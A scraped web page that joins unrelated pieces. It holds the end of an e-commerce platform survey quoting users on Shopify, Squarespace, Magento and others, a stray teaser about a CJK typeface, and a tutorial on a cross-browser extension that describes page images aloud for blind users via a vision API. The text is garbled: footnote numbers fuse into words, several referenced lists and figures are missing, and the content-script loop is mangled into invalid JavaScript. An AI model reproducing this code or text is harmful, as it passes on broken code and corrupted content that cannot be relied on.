| Spark Pay | 65% |
| Volusion | 51% |
Shopify is the pretty clear winner, with Squarespace close behind — but both companies are actually complementary. Shopify is a complete, robust solution that works for both small and large stores, while Squarespace is a simple, approachable platform that works well for stores just starting out. (Worth noting: I’ve done similar surveys for portfolio builders5 and landing-page builders6, and Shopify is the only company I’ve seen score higher than 95% in customer satisfaction.)
But looking only at customer satisfaction is not enough. After all, e-commerce platforms have different strengths. So, I also asked users what they like and dislike about their software and found some important insights about each company.
App store and features
“The best thing is that you don’t need a developer to add features… there’s a ton of apps available.” | “Their partner ecosystem is best.” | “Shopify has any feature under the sun — if you think you need it, someone already created an app.” | “Access to Shopify Apps is great.” | “There’s heaps of third-party apps you can integrate easily that I believe are essential to growing a business.” | “So many third-party apps, templates that other platforms aren’t popular enough to have.” | “There are many apps that can help with customization issues.” | “There are a ton of great third-party apps for extended functionality.”
Ease of use
“Easy to set up without having specific skills.” | “Intuitive user interface.” | “Simple to use.” | “It is very easy to start selling online.” | “Easy UI, pretty intuitive.” | “The interface is excellent for managing e-commerce.” | “It’s really clean and easy to manage.” | “Shopify provides a very straightforward way to add products, edit options and to apply different themes.” | “More than anything, very simple.” | “It’s simple and intuitive.” | “Very user-friendly.” | “Super user-friendly for non-computer guys like myself.” | “The back end is exceptional.”
Ease of use
“It’s very easy to use.” | “The e-commerce is so easy to use.” | “It’s easy to configure, simple to add, delete and modify our inventory, and most importantly it allows us to easily keep track of our ins and outs with helpful metrics and sales graphs.” | “It’s very easy to set up.” | “The user interface is easy to use.” | “Commerce is really nice and easy to set up.” | “Love the interface, very easy to work with.” | “I find it easy to use.” | “It was pretty easy to set up and has been a snap to maintain.” | “It’s all pretty smooth and easy.” | “It’s super-easy.” | “I’ve tried Drupal, WordPress… the interface and creative ability of Squarespace is much superior.”
Templates
“Has some great templates for a good-looking website.” | “Squarespace is an easy way to get a great looking site.” | “The sites are beautiful.” | “The templates and editing features on the blog and site are super-easy.” | “The thing I like most are the beautiful and easy templates.”
Limitations
“The only thing I would say they need to improve is allowing more than one currency on the e-commerce site, which currently is not available.” | “It works pretty good for basic sales of items.” | “There are some limitations in terms of customizing, but they are minor.” | “If you are using it as is and just need the limited feature set that it comes with, it’s a great option.” | “Overall, it’s great for putting a few simple products up, but if you need anything beyond their default cart options, get a proper Squarespace developer or someone to set up a Shopify site for you.” | “It is really a great place to start, but unfortunately a place that is easily transitioned out of once the business begins to grow.”
Shipping
“My partners have had some concerns with the shipping aspect, though.” | “Yes, I would recommend it, but Squarespace needs to have calculated shipping for all the plans.” | “The shipping is still something I wish was a little easier.” | “The only thing I would say is that, for me, the shipping options are more limited than I would like.” | “There are some features I wish were better implemented in the base package (like shipping integration for international orders), but I’d recommend it.”
9Good for new stores
“I would recommend Big Cartel for smaller shops.” | “I would recommend it, especially startup users.” | “It’s a great place to start out!” | “We’d recommend it for similar businesses, especially those just getting started.” | “It is a great platform for something really simple and was very easy to set up.” | “Big Cartel is great for beginning stages of a store. We’re actually entertaining moving to a new platform right now.” | “It’s quite good for a small company or startup, for sure.” | “I’m finding that in the early stages of the business, it’s extremely handy for stock listing and very straightforward to use.”
Ease of use
“It’s very easy to use.” | “It’s very easy to use, navigate and customize the shopfront.” | “I am particularly fond of the back end and the admin tools. They make maintaining and shipping products a breeze.” | “It’s super-simple and really user-friendly.” | “I’m not savvy, so it works well for my skill level.” | “Easy to set up… and easy to control and set inventory.” | “They make it so easy to have a beautiful website.” | “For just a few items, Big Cartel totally gets the job done and is user-friendly.”
Price
“I only have to pay $9.99 a month for Big Cartel. That’s a huge perk for me.” | “Low price point and easy to use.” | “The rates are the lowest considering all the things you’re able to do.” | “I have found the cost is a lot better than my Etsy store.” | “You get a great platform for a great price.” | “Compared to Etsy, the fees are ridiculously cheap!” | “One fee a month, no item fees per listing… There is an option to open a store for free with five listings. This is an amazing feature.” | “Their prices are also very reasonable.”
Limitations
“Lacking in features.” | “It is limited in terms of themes… You always know when you’re on a Big Cartel site.” | “It does most of what I expect of it, but also has limitations.” | “The one problem I have is that the only options for receiving payments are PayPal and Stripe.” | “If you want more of an interactive site with blogs and videos and whatnot, I think there are better options out there.” | “We are currently moving over to Shopify because we have maxed out Big Cartel’s limited 300-item store capacity. That is the only downside of Big Cartel.” | “You are limited by what Big Cartel allows you to do. For example, there are certain promotions that I would like to do, but currently Big Cartel has no way of allowing it.”
11Extensions
“Many useful plugins for it.” | “So many features.” | “There are plenty of add-ons with it to customize shop as we need.” | “Fully customizable.” | “The plugin architecture is great.” | “It also has a lot of plugins.” | “It’s very good if you are looking for something that can do anything… there are extensions available, and coders who can write plugins.” | “I’m a fan of the plugins because it allows for a lot of customization.”
Ecosystem
“The ecosystem is well supported.” | “Great support with a whole online community dedicated to it.” | “I’m always able to find the answer to any question I have, either through the official WooCommerce knowledge base or in the community forums.”
Developer may be required
“Custom modifications do require somewhat advanced developer knowledge.” | “WooCommerce does require knowledge in website building… At one point, it became extremely slow, and I couldn’t figure out where the problem was.” | “What should be native often requires plugins or coding.” | “Very customizable with some code editing.” | “WooCommerce definitely requires a solid knowledge of the inner workings.” | “There definitely is a learning curve, but it is not too hard to master.” | “It had to be highly customized for us by our website developers.”
13Extensions
“There are plenty of extensions (free and for purchase).” | “Tons of extensions to make it really awesome.” | “OpenCart extensions… have been very valuable and reliable.” | “Customization does need IT capabilities, though.” | “The software is only as good as its implementers.”
Often requires a developer
“It took some PHP programming to get it completely as we wish, but now it works fine and suits my goals well.” | “If you do not have someone capable of working behind the scenes, it would be difficult to manage.” | “I’d recommend it if and only if you have at least some knowledge web programming (PHP, JavaScript, XML, MySQL, etc.).” | “Not recommended for anyone without some web programming knowledge.” | “With the right technical staff, yes I would.” | “If you would be a serious user, I can recommend OpenCart, but also I would recommend hiring a developer to make all custom improvements.” | “Yes, I would recommend it as a good platform with cheap extensions.” | “There is also a large amount of high-quality extensions.” | “Tons of plugins, both free to paid.”
Extensions can create bugs
“When you modify it, it does amazing things but is super-finicky.” | “Buying and installing extensions is a bad idea… It’s not a plug-and-play procedure.” | “As we grew bigger, there have been headaches, mostly to do with third-party extensions clashing with each other.”
15Customer support
“The Jumpseller team is also very helpful… They’ll walk you through the process of making website [changes], so you can really understand.” | “Technical support is great, always helpful and fast.” | “The best thing is its excellent service, very fast and efficient.” | “Support has worked well so far. When we’ve submitted a query, we’ve gotten quick feedback.” | “Fast and good email support.” | “The customer service is very responsive and helpful.” | “The email response time is super-fast. If I have one question or doubt regarding anything, from design to DNS configuration, they’ll reply in less than 15 minutes!”
Using it for Chilean and international stores
“Our store is based in Chile, and another feature we appreciated is that it had full integration with local payment systems.” | “Has local credit-card options (in our country).” | “Recently, they integrated the price list of one of the shipping companies most used in our country.” | “The good thing is the translation tool.” | “I can tell you that we have selected Jumpseller because we are selling in Chile, and the store was very well integrated with the most popular payment methods, couriers, etc.”
17Ease of use
“It is easy to set up.” | “Easy to maintain.” | “Fairly user-friendly.” | “They really made everything so simple to make extremely intuitive changes quickly.” | “It’s easy to work with.” | “I would recommend it for a new user because of the ease of use in building a store.” | “Easy to use and have had no issues.”
Limitations
“There are design limitations, though.” | “It is lacking in several business customization respects.” | “I wish there was a little more customization allowed.” | “There are some design limitations unless you know HTML.” | “Product is good but has many limitations.” | “I like it, but it does have limitations.” | “It has some limitations, but I have been able to work around them.” | “It does have its limitations on customizing, though.”
Credit-card processor options
“It would be better if it allowed shoppers to use a credit card to place an order, even if we don’t use their approved credit-card processor.” | “We were happy with them for years, and then out of the blue, the payment processors affiliated with GoDaddy dropped us.” | “We will be switching all of our stores from GoDaddy in the near future because it does not allow you to use the merchant service of your choice. You are forced to use Stripe.”
19Support
“Tech support has always been responsive and friendly.” | “Good customer support.” | “I have been able to live chat or call with questions without issue.” | “The support is excellent.” | “Very quick responses to any of our requests.” | “Their support is very good.” | “Their customer service is absolutely the very best.” | “You can always call them 24/7 if you need any kind of support, and it doesn’t cost any extra money.” | “Their tech support is awesome.” | “Tech support has always been responsive and friendly.” | “CoreCommerce’s service is good. It has a mom and pop feel to it.”
Price
“Price for the features and benefits given is exceptional, and no one we’ve spoken with can come close to the value.” | “It is a very cost-effective solution.” | “It is also very affordable.” | “I have yet to find another platform that offers the same value as CoreCommerce (at least for our particular business).” | “Prices are good.”
Feels outdated
“Technologies are old, and they are very slow to update it.” | “It feels like the year 2003.” | “Outdated and uninspiring admin panel.” | “They’ve been a bit behind the times with integrations (still no Bitcoin, for example).” | “They are using an antiquated system, which doesn’t bode well for tie-in structures for the future.”
Difficult to use
“I do find the GUI to be somewhat frustrating and unintuitive.” | “It is annoying when you [have] to update each thing in multiple areas.” | “It is not intuitive or user-friendly.” | “The product was flaky. Flexible but badly designed in lots of areas.” | “Control panel sucks.”
21Customer support
“I emailed the president [of BigCommerce] at 1:00 am requesting help… Within 10 minutes, [he] was on it with compassion and ready to help. They have bent over backward for me.” | “They provide excellent customer support.” | “If nothing else, they seem to have great customer service.” | “More than anything, we care about customer service, and BigCommerce provides excellent customer service.” | “Technical support has been great.” | “Great support.” | “Their tech support is 24/7 and is very responsive to our questions.” | “Customer service… is very helpful.”
Price
“Their pricing structure is punitive for successful businesses… This is surely a recurring theme if you’ve reached out to many B2C website users who have grown their site.” | “A bit pricey when your sales hit over $300,000 a year.” | “[Recently,] my monthly payments increased from $25 to $250 due to my business exceeding the annual sales of their intermediate plan.” | “Because of our sales volume, BigCommerce frequently increases our monthly fees based on increasing sales. This has become very expensive.” | “A bit pricey.” | “We feel it is overpriced these days.” | “Their pricing structure makes no sense, but I’ve been with them for seven years.” | “I would recommend BigCommerce. Pricing is a bit high, though.” | “I personally think the pricing is a little steep.”
23Not for non-developers
“Not as friendly for a non-developer or an individual who just wants to set up shop on their own and doesn’t have a technical background.” | “Ubercart works well as long as you have an experienced programmer.” | “Please note that it would require a developer who knows Drupal, because many aspects needed customization.” | “[I would recommend it ] if you’re comfortable with Drupal.”
Difficult to use
“Ubercart is OK, but it is hard to customize.” | “The learning curve is quite steep.” | “It can be a bit tricky to get your store looking just the way you want.” | “Ubercart isn’t the easiest to set up or work with.” | “The only disadvantage of Ubercart is the complex configuration of the store system.” | “It’s not as plug-and-play as Shopify.”
25Ease of use
“The e-commerce site is beyond simple to use.” | “I would recommend it on one level: It’s easy to use. I can do all the building and updating myself, and so that’s good.” | “Easy to use.” | “Easy to build and maintain.” | “It is user-friendly, easy to set up and modify.” | “It’s super-easy to use, and it seems like everyone who’s ordered from me has also done so with ease.” | “If you want a simple storefront, it’s pretty straightforward, easy and cheap.” | “It is easy to set up.” | “It’s easy to use and user-friendly.” | “It was pretty intuitive to set up.”
Limitations
“It is basic.” | “There are some limitations with shipping and accounting (sending to QuickBooks, etc.).” | “A little limited in some options.” | “I have not been able to make it work in the way I need.” | “I cannot update the inventory amount.” | “We had so many different options, which the configuration of the store and products did not allow us to do.” | “We also wanted to be able to get customers reviews and could not do it.” | “My main complaint is the lack of customization options — for example, not being able to display a price per pound.” | “If you want a variety of options and a wide range of modifications, it is not ideal.”
27Highly customizable
“We have complete control over our Magento store and have customized it extensively to meet our needs. That’s what I like most about it.” | “The amount of customizations and extensions available are endless.” | “It has an unparalleled level of customization and freedom.” | “It has a lot of great customization features.” | “It’s pretty powerful.”
Difficult to use
“Probably the steepest learning curve.” | “It’s very expensive to get changes made.” | “Magento is overkill for what I need to do on my site.” | “User interface is not as easy as it could be.” | “It can be a real pain sometimes.” | “Complicated to set up.” | “It’s got a steep learning curve.” | “Magento has a huge learning curve.” | “It breaks for no reasons, and it breaks if you add anything to the site.” | “Always something going wrong for no apparent reason.”
Often requires professional help
“You will need a good PHP programmer if you intend to add anything to it beyond the default installation.” | “If one wants to really change Magento, one needs an expert.” | “Needs a good specialist to partner with to get the best out of it.” | “I would recommend it as long as you have a true Magento-certified developer to hold your hand the entire way and to create your site and work with you.” | “Magento is good if you’re a web developer and have coding skills.”
29Ease of use
“It is very easy to use.” | “It was easy to use without web design experience.” | “It is basic and easy to use.” | “I have enjoyed the ease of Weebly and what you can accomplish with the tools.” | “It is extremely easy for me to use.” | “I’d recommend it because it is so easy to set up and track inventory.” | “This is one of the easiest [e-commerce platforms] I have used.” | “I do like the online store with Weebly because of the ease of use.” | “Weebly is really easy to use.”
Third-party hosts
“[Weebly] is offered through MacHighway, which I use for my hosting, so there were some glitches in the beginning that probably wouldn’t have been there if I’d gone straight through Weebly.” | “Just make sure you buy the Weebly subscription directly through weebly.com and not through a reseller, because I lost a whole website that way.” | “I would recommend it but only through the Weebly host.” | “The B.S. part is that since day one, iPower (a third-party Weebly host) claimed I was getting an ultra-premium package but was only paying for basic. I would go to edit a product and nothing worked. I’d call customer support and they’d tell me I need to upgrade. This has happened to me twice in three years with them. I’m hoping they get stuck with a class-action suit for fraud.” | “iPage is my host for Weebly. Because of this, I don’t have access to all of the features Weebly offers.” | “… Full access to all of the Weebly features would sort that at once, but iPage (maybe I should change) wants to lock me in for three years and pay the full amount up front!”
Limited features
“If you want a more customizable tool, then this might not work for you.” | “Weebly is missing some of the critcal things that we want from an online store.” | “I am hoping that they have, or will come up with, an automatic shipping calculation.” | “The only hiccup is when I need to change my prices. I have a lot of inventory, and I have found that the easiest way (relatively speaking) to do this is to change each one individually.” | “You can’t do everything design-wise on it.” | “It was perfect for me at first, but I have grown out of it very quickly [because of limited features].” | “The Weebly platform is not scalable. There is no element to customize your cart.” | “The shipping is a problem because it can’t be adjusted for lighter, heavier or multiple items.”
31Bandwidth overage charges
“If you read the forums, one problem that continually arises, and one that I have, is bandwidth. It seems that I’m always going over my bandwidth, even though I have relatively few products and dump files regularly.” | “3dcart charges for bandwidth, so serving lots of digital products from your server might not be a great idea depending on your budget.” | “They charge you for data, and it adds up.” | “It tends to use a lot of bandwidth. My store doesn’t have a huge amount of traffic (yet!), but I still go over my plan just about every month.”
Customer support
“Their comments are snarky, and their help is judgemental in that they always place blame on the customer, and it can take up to a week for them to solve a problem.” | “”Customer support has a laissez-faire attitude.” | “I have to really keep on them when I open a ticket, or I may not get a response for days.” | “I would say the biggest con has been customer service.” | “I would characterize them as almost disrespectful.” | “Their lack of support [was surprising].” | “The tech support also cannot help with even the most basic HTML questions.” | “Technical support online isn’t the best.” | “The help line is not very helpful. If there is a problem, such as the system stops taking orders or accepting credit cards, they assume it’s a problem on your end.” | “Their live support sucks.”
Difficult to use
“I feel the product is terribly cumbersome.” | “The admin interface makes it very difficult to find what settings I’m looking for.” | “It is awkward and not very user-friendly.” | “My website is with 3dcart, but it is overwhelming.” | “It is a little quirky in the back end.” | “I personally find it difficult to make even simple changes to.” | “Some of it is not very intuitive, so you have to keep clicking around until you remember where everything is.”
33Modules
“It has quite a lot of modules.” | “It has loads of modules” | “Lots of additional modules and functionalities to add.” | “A lot of modules.” | “They have a lot of free and already installed modules.” | “There are a lot of free modules.” | “Large offer of modules.”
Difficult to use
“You need to be quite a good geek to understand everything.” | “We’ve encountered and still are encountering lots of problems with PrestaShop.” | “PrestaShop isn’t as user-friendly as others are nowadays.” | “The admin panel is not user-friendly.” | “I don’t recommend it for a beginner or if you don’t have much technical skill.”
Buggy
“I hate it… It’s buggy and impossible to upgrade easily to newer versions.” | “It’s kind of an unstable, slow system for me, but I think in the near future it will be more stable and fast.” | “We have lots of problems with PrestaShop.” | “No, I would not recommend it. Buggy as hell.” | “No, I would not recommend it. Too heavy and too slow.” | “The back-end pages sometimes take an age to load — even for simple stuff.”
35Good for beginners
“Quick and easy. I think its simplicity best suits the light or new user.” | “Great for people with no knowledge [of how to build a store].” | “For someone with zero experience building a website, I found their product to be so easy to navigate.” | “I highly recommend it for beginners.”
Pricing
“Way too expensive.” | “There are cheaper options out there that do the same thing.” | “I liked Goodsie when I started with them five or six years ago, but their prices keep going up.” | “Prices were hiked above what they should be, so I am about to change.” | “The price went from $15 to $30 per month not too long ago.”
37Customer support is prompt
“Whenever we’ve needed support, their help systems are very responsive.” | “Spark Pay’s technical support is excellent.” | “Very responsive for help.” | “They have been responsive to any needs I’ve had.” | “I find their customer service to be quite responsive.” | “Tech support is very responsive via phone or email.” | “They have been very responsive to helping out with general website questions and problems.”
Bandwidth overage charges
“The main thing I don’t like are the extra bandwidth charges.” | “Nailed with huge bandwidth charges.” | “They are little hidden fees for going over your bandwidth account file storage and product count if you don’t keep an eye on them.”
Difficult to use
“Spark Pay is not simple!” | “They have a ton of features built in — most of them are half-baked and don’t function 100%, which has led to frustration.” | “[Needs to] reduce the bloat in their software.” | “Unless you have a designer and/or developer on staff, or at the very least a very computer-savvy non-techie, it’s virtually impossible to understand Spark Pay.” | “Their web editor is clumsy.” | “Their platform is buggy.” | “It is crazy complicated to make even some of the most mundane changes.” | “Their system bogs down so much that only the most minor of changes are doable.” | “Clunky UI, way too much complexity. Just a nightmare to deal with.”
While prompt, customer support can be disappointing
“There service desk really isn’t one. They have no formal (or competent) escalation process.” | “They are not nearly as responsive to fixing significant issues as they should be.” | “I feel like the platform has a lot of tools to offer, but few resources to teach you how to use them.” | “Technical support is rather lacking. When you do finally get someone to answer the tickets, they do a very minimal amount of work and effort to correct the problem.”
39Customer support
“Their technical support department people are top-notch… I’m extremely impressed with them.” | “The [support] team at Volusion is knowledgeable, and that is highly important.” | “Their customer support is excellent.” | “Their support is superb.” | “Support is second to none.” | “There technical support team is also very good in helping to fix any issues that we might have had.”
Bandwidth limitations
“The one thing I can’t stand is the amount of bandwidth they provide you with. [It] will easily be gone in a week if you have a lot of visitors.” | “They don’t have adequate bandwidth plans, and their billing for bandwidth overages is highly irritating.” | “Site traffic is pricey.” | “I originally used very large images for my products and received some rather stiff hosting fines for going over the stupidly low bandwidth level.” | “The way they charge for bandwidth caused us to have obscene overage charged for months.”
Expensive
“It is particularly expensive, and the costs weren’t clear [when we started].” | “Once the site is built, they nickel and dime you for every little thing imaginable.” | “I also used the Volusion SEO team and that was a joke. $1600 a month!” | “Not the least expensive around.” | “I would caution new users to be aware of hidden costs. Email addresses are extra. An SSL certificate is extra. A service to check the reliability of each credit card is extra. SEO and design services are phenomenally expensive.” | “Going by the prices they charge for SEO packages, they’re aiming at companies far larger than mine.” | “If you want anything besides barebone offerings, everything else is available… for a price.” | “I just wish it was a little cheaper.” | “Volusion keeps [the initial setup and customization] complicated, hoping that you will pay them to do it for you.”
Difficult to use
“The back end is not user-friendly.” | “The UX is confusing and bloated, but I’m used to it.” | “There is a learning curve, so it takes a while to get going. And if you want customization, be prepared to learn it yourself or pay some hefty fees.” | “It’s not straightforward and is prone to errors.” | “If you change a font size within the text, you then lose all other formatting — nothing major, but annoying and time-consuming.” | “It’s quite clunky to manage content and design.” | “There are random glitches throughout the site that have probably cost me thousands in abandoned carts.” | “One thing that is hard for me is manipulating website elements. GoDaddy was easier for me.”
41It’s worth noting that this is not a list of all e-commerce software currently available in the world. Instead, I’ve only included software for which I was able to talk to a minimum of 30 users (and I was not able to find 30 users for several companies).
But this is a fairly comprehensive list of the most popular e-commerce platforms. Furthermore, these are the thoughts of real, verified users. I hope it’s helpful in your search for the right e-commerce software!
This article is based off of the e-commerce software guide originally published here43.
(vf, al, il)
Read the story behind the open source Pan-CJK typeface by Adobe that supports Simplified Chinese, Traditional Chinese, Japanese, and Korean.
In today’s article, we’ll create a JavaScript extension that works in all major modern browsers, using the very same code base. Indeed, the Chrome extension model based on HTML, CSS and JavaScript is now available almost everywhere, and there is even a Browser Extension Community Group1 working on a standard.
I’ll explain how you can install this extension that supports the web extension model (i.e. Edge, Chrome, Firefox, Opera, Brave and Vivaldi), and provide some simple tips on how to get a unique code base for all of them, but also how to debug in each browser.
Note: We won’t cover Safari in this article because it doesn’t support the same extension model2 as others.
I won’t cover the basics of extension development because plenty of good resources are already available from each vendor:
So, if you’ve never built an extension before or don’t know how it works, have a quick look at those resources. Don’t worry: Building one is simple and straightforward.
Let’s build a proof of concept — an extension that uses artificial intelligence (AI) and computer vision to help the blind analyze images on a web page.
We’ll see that, with a few lines of code, we can create some powerful features in the browser. In my case, I’m concerned with accessibility on the web and I’ve already spent some time thinking about how to make a breakout game accessible using web audio and SVG14, for instance.
Still, I’ve been looking for something that would help blind people in a more general way. I was recently inspired while listening to a great talk by Chris Heilmann15 in Lisbon: “Pixels and Hidden Meaning in Pixels16.”
Indeed, using today’s AI algorithms in the cloud, as well as text-to-speech technologies, exposed in the browser with the Web Speech API17 or using a remote cloud service, we can very easily build an extension that analyzes web page images with missing or improperly filled alt text properties.
My little proof of concept simply extracts images from a web page (the one in the active tab) and displays the thumbnails in a list. When you click on one of the images, the extension queries the Computer Vision API to get some descriptive text for the image and then uses either the Web Speech API or Bing Speech API to share it with the visitor.
The video below demonstrates it in Edge, Chrome, Firefox, Opera and Brave.
You’ll notice that, even when the Computer Vision API is analyzing some CGI images, it’s very accurate! I’m really impressed by the progress the industry has made on this in recent months.
I’m using these services:
TODO section in the code with your key to make this extension work on your machine. To get an idea of what this API can do, play around with it20.But feel free to try other similar services:
You can find the code for this small browser extension on my GitHub page27. Feel free to modify the code for other products you want to test.
Most of the code and tutorials you’ll find use the namespace chrome.xxx for the Extension API (chrome.tabs, for instance).
But, as I’ve said, the Extension API model is currently being standardized to browser.xxx, and some browsers are defining their own namespaces in the meantime (for example, Edge is using msBrowser).
Fortunately, most of the API remains the same behind the browser. So, it’s very simple to create a little trick to support all browsers and namespace definitions, thanks to the beauty of JavaScript:
window.browser = (function () { return window.msBrowser || window.browser || window.chrome; })();
And voilà!
Of course, you’ll also need to use the subset of the API supported by all browsers. For instance:
Let’s review together the architecture of this extension. If you’re new to browser extensions, this should help you to understand the flow.
Let’s start with the manifest file31:
32This manifest file and its associated JSON is the minimum you’ll need to load an extension in all browsers, if we’re not considering the code of the extension itself, of course. Please check the source34 in my GitHub account, and start from here to be sure that your extension is compatible with all browsers.
For instance, you must specify an author property to load it in Edge; otherwise, it will throw an error. You’ll also need to use the same structure for the icons. The default_title property is also important because it’s used by screen readers in some browsers.
Here are links to the documentation to help you build a manifest file that is compatible everywhere:
The sample extension used in this article is mainly based on the concept of the content script38. This is a script living in the context of the page that we’d like to inspect. Because it has access to the DOM, it will help us to retrieve the images contained in the web page. If you’d like to know more about what a content script is, Opera39, Mozilla40 and Google41 have documentation on it.
Our content script42 is simple:
43console.log("Dare Angel content script started"); browser.runtime.onMessage.addListener(function (request, sender, sendResponse) { if (request.command == "requestImages") { var images = document.getElementsByTagName('img'); var imagesList = []; for (var i = 0; i 64 && images[i].height > 64)) { imagesList.push({ url: images[i].src, alt: images[i].alt }); } } sendResponse(JSON.stringify(imagesList)); } }); view raw
This first logs into the console to let you check that the extension has properly loaded. Check it via your browser’s developer tool, accessible from F12, Control + Shift + I or ⌘ + ⌥ + I.
It then waits for a message from the UI page with a requestImages command to get all of the images available in the current DOM, and then it returns a list of their URLs if they’re bigger than 64 × 64 pixels (to avoid all of the pixel-tracking junk and low-resolution images).
45The popup UI page47 we’re using is very simple and will display the list of images returned by the content script inside a flexbox container48. It loads the start.js script, which immediately creates an instance of dareangel.dashboard.js49 to send a message to the content script to get the URLs of the images in the currently visible tab.
Here’s the code that lives in the UI page, requesting the URLs to the content script:
browser.tabs.query({ active: true, currentWindow: true }, (tabs) => { browser.tabs.sendMessage(tabs[0].id, { command: "requestImages" }, (response) => { this._imagesList = JSON.parse(response); this._imagesList.forEach((element) => { var newImageHTMLElement = document.createElement("img"); newImageHTMLElement.src = element.url; newImageHTMLElement.alt = element.alt; newImageHTMLElement.tabIndex = this._tabIndex; this._tabIndex++; newImageHTMLElement.addEventListener("focus", (event) => { if (COMPUTERVISIONKEY !== "") { this.analyzeThisImage(event.target.src); } else { var warningMsg = document.createElement("div"); warningMsg.innerHTML = "
Please generate a Computer Vision key in the other tab. Link
"; this._targetDiv.insertBefore(warningMsg, this._targetDiv.firstChild); browser.tabs.create({ active: false, url: "https://www.microsoft.com/cognitive-services/en-US/sign-up?ReturnUrl=/cognitive-services/en-us/subscriptions?productId=%2fproducts%2f54d873dd5eefd00dc474a0f4" }); } }); this._targetDiv.appendChild(newImageHTMLElement); }); }); });
We’re creating image elements. Each image will trigger an event if it has focus, querying the Computer Vision API for review.
This is done by this simple XHR call:
analyzeThisImage(url) { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = () => { if (xhr.readyState == 4 && xhr.status == 200) { var response = document.querySelector('#response'); var reponse = JSON.parse(xhr.response); var resultToSpeak = `With a confidence of ${Math.round(reponse.description.captions[0].confidence * 100)}%, I think it's ${reponse.description.captions[0].text}`; console.log(resultToSpeak); if (!this._useBingTTS || BINGSPEECHKEY === "") { var synUtterance = new SpeechSynthesisUtterance(); synUtterance.text = resultToSpeak; window.speechSynthesis.speak(synUtterance); } else { this._bingTTSclient.synthesize(resultToSpeak); } } }; xhr.onerror = (evt) => { console.log(evt); }; try { xhr.open('POST', 'https://api.projectoxford.ai/vision/v1.0/describe'); xhr.setRequestHeader("Content-Type", "application/json"); xhr.setRequestHeader("Ocp-Apim-Subscription-Key", COMPUTERVISIONKEY); var requestObject = { "url": url }; xhr.send(JSON.stringify(requestObject)); } catch (ex) { console.log(ex); } } view raw
The following articles will you help you to understand how this Computer Vision API works:
In our case, we’re using the describe feature of the API. You’ll also notice in the callback that we will try to use either the Web Speech API or the Bing Text-to-Speech service, based on your options.
Here, then, is the global workflow of this little extension:
52Let’s review quickly how to install the extension in each browser.
Download or clone my small extension54 from GitHub somewhere to your hard drive.
Also, modify dareangel.dashboard.js to add at least a Computer Vision API key. Otherwise, the extension will only be able to display the images extracted from the web page.
First, you’ll need at least a Windows 10 Anniversary Update (OS Build 14393+) to have support for extensions in Edge.
Then, open Edge and type about:flags in the address bar. Check the “Enable extension developer features.”
55Click on “…” in the Edge’s navigation bar and then “Extensions” and then “Load extension,” and select the folder where you’ve cloned my GitHub repository. You’ll get this:
56Click on this freshly loaded extension, and enable “Show button next to the address bar.”
57Note the “Reload extension” button, which is useful while you’re developing your extension. You won’t be forced to remove or reinstall it during the development process; just click the button to refresh the extension.
Navigate to BabylonJS626158, and click on the Dare Angel (DA) button to follow the same demo as shown in the video.
In Chrome, navigate to chrome://extensions. In Opera, navigate to opera://extensions. And in Vivaldi, navigate to vivaldi://extensions. Then, enable “Developer mode.”
Click on “Load unpacked extension,” and choose the folder where you’ve extracted my extension.
59Navigate to BabylonJS626158, and open the extension to check that it works fine.
You’ve got two options here. The first is to temporarily load your extension, which is as easy as it is in Edge and Chrome.
Open Firefox, navigate to about:debugging and click “Load Temporary Add-on.” Then, navigate to the folder of the extension, and select the manifest.json file. That’s it! Now go to BabylonJS626158 to test the extension.
63The only problem with this solution is that every time you close the browser, you’ll have to reload the extension. The second option would be to use the XPI packaging. You can learn more about this in “Extension Packaging65” on the Mozilla Developer Network.
The public version of Brave doesn’t have a “developer mode” embedded in it to let you load an unsigned extension. You’ll need to build your own version of it by following the steps in “Loading Chrome Extensions in Brave66.”
As explained in that article, once you’ve cloned Brave, you’ll need to open the extensions.js file in a text editor. Locate the lines below, and insert the registration code for your extension. In my case, I’ve just added the two last lines:
// Manually install the braveExtension and torrentExtension extensionInfo.setState(config.braveExtensionId, extensionStates.REGISTERED) loadExtension(config.braveExtensionId, getExtensionsPath('brave'), generateBraveManifest(), 'component') extensionInfo.setState('DareAngel', extensionStates.REGISTERED) loadExtension('DareAngel', getExtensionsPath('DareAngel/')) view raw
Copy the extension to the app/extensions folder. Open two command prompts in the browser-laptop folder. In the first one, launch npm run watch, and wait for webpack to finish building Brave’s Electron app. It should say, “webpack: bundle is now VALID.” Otherwise, you’ll run into some issues.
67Then, in the second command prompt, launch npm start, which will launch our slightly custom version of Brave.
In Brave, navigate to about:extensions, and you should see the extension displayed and loaded in the address bar.
69Tip for all browsers: Using console.log(), simply log some data from the flow of your extension. Most of the time, using the browser’s developer tools, you’ll be able to click on the JavaScript file that has logged it to open it and debug it.
To debug the client script part, living in the context of the page, you just need to open F12. Then, click on the “Debugger” tab and find your extension’s folder.
Open the script file that you’d like to debug — dareangel.client.js, in my case — and debug your code as usual, setting up breakpoints, etc.
71If your extension creates a separate tab to do its job (like the Page Analyzer73, which our Vorlon.js74 team published in the store), simply press F12 on that tab to debug it.
75If you’d like to debug the popup page, you’ll first need to get the ID of your extension. To do that, simply go into the property of the extension and you’ll find an ID property:
77Then, you’ll need to type in the address bar something like ms-browser-extension://ID_of_your_extension/yourpage.html. In our case, it would be ms-browser-extension://DareAngel_vdbyzyarbfgh8/dashboard.html. Then, simply use F12 on this page:
78Because Chrome and Opera rely on the same Blink code base, they share the same debugging process. Even though Brave and Vivaldi are forks of Chromium, they also share the same debugging process most of the time.
To debug the client script part, open the browser’s developer tools on the page that you’d like to debug (pressing F12, Control + Shift + I or ⌘ + ⌥ + I, depending on the browser or platform you’re using).
Then, click on the “Content scripts” tab and find your extension’s folder. Open the script file that you’d like to debug, and debug your code just as you would do with any JavaScript code.
80To debug a tab that your extension would create, it’s exactly the same as with Edge: Simply use the developer tools.
82For Chrome and Opera, to debug the popup page, right-click on the button of your extension next to the address bar and choose “Inspect popup,” or open the HTML pane of the popup and right-click inside it to “Inspect.” Vivaldi only supports right-click and then “Inspect” inside the HTML pane once opened.
84For Brave, it’s the same process as with Edge. You first need to find the GUID associated with your extension in about:extensions:
86And then, in a separate tab, open the page you’d like to debug like — in my case, chrome-extension://bodaahkboijjjodkbmmddgjldpifcjap/dashboard.html — and open developer tools.
87For the layout, you have a bit of help using Shift + F8, which will let you inspect the complete frame of Brave. And you’ll discover that Brave is an Electron app using React!
Note, for instance, the data-reactroot attribute.
89Note: I had to slightly modify the CSS of the extension for Brave because it currently displays popups with a transparent background by default, and I also had some issues with the height of my images collection. I’ve limited it to four elements in Brave.
Mozilla has really great documentation on debugging web extensions91.
